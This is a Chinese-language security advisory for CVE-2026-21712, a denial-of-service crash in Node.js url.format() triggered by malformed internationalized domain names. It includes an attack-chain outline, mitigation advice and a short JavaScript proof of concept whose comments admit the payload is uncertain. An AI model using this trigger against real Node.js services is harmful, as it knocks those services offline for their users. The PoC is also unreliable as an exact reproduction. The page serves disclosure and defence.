CVE-2026-21712 CVSS 5.7 中危

CVE-2026-21712 Node.js URL处理拒绝服务漏洞

披露日期: 2026-03-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-21712

漏洞类型

拒绝服务

CVSS评分

5.7 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Node.js

漏洞概述

Node.js URL处理组件存在安全漏洞。当调用`url.format()`方法处理含有无效字符的畸形国际化域名（IDN）时，会触发底层原生代码的断言失败机制。这将直接导致Node.js进程意外崩溃，从而使服务不可用，造成拒绝服务攻击。

技术细节

该漏洞源于Node.js底层URL处理机制对国际化域名（IDN）的解析校验不严。攻击者可构造包含特定非法Unicode字符序列的畸形IDN。当目标Node.js应用程序调用`url.format()`函数处理该恶意URL对象时，底层的C++绑定代码（如V8或libuv相关组件）在执行字符转换或验证逻辑时会触发断言失败。在Node.js的架构中，原生代码层面的断言失败通常是致命错误，会直接导致整个进程异常退出，且JavaScript层面的错误捕获机制无法处理。攻击者可通过网络请求诱导应用解析此类URL，从而实现拒绝服务攻击，导致业务中断。

攻击链分析

STEP 1

构造恶意输入

攻击者构造一个包含畸形国际化域名（IDN）的恶意URL，其中包含无效的Unicode字符。

STEP 2

发送请求

攻击者将包含恶意URL的数据发送给目标Node.js应用程序，例如通过Web请求参数。

STEP 3

触发漏洞

目标应用程序接收数据并调用`url.format()`函数处理该URL。

STEP 4

进程崩溃

底层原生代码处理无效IDN时触发断言失败，导致Node.js进程终止，服务拒绝。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2026-21712
// This script demonstrates triggering the crash via malformed IDN

const url = require('url');

// Malformed IDN with invalid characters
// The exact payload may vary, but involves invalid Unicode in hostname
const maliciousUrl = {
    protocol: 'https:',
    hostname: 'xn--' + '\ufffd'.repeat(10) + '.example.com'
};

console.log('Attempting to format URL...');

try {
    // This call triggers the assertion failure in vulnerable versions
    const formatted = url.format(maliciousUrl);
    console.log('URL formatted successfully:', formatted);
} catch (err) {
    console.error('Caught JS exception:', err);
}

// In vulnerable versions, the process crashes before catch block or exit

影响范围

Node.js (具体受影响版本请参考官方2026年3月安全发布版)

防御指南

临时缓解措施

建议开发者对传入的URL主机名进行严格的格式校验，过滤或拦截包含非标准字符或异常结构的IDN，避免直接将不可信的输入传递给`url.format()`函数。同时，确保应用具备进程监控和自动重启机制以应对潜在的崩溃。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表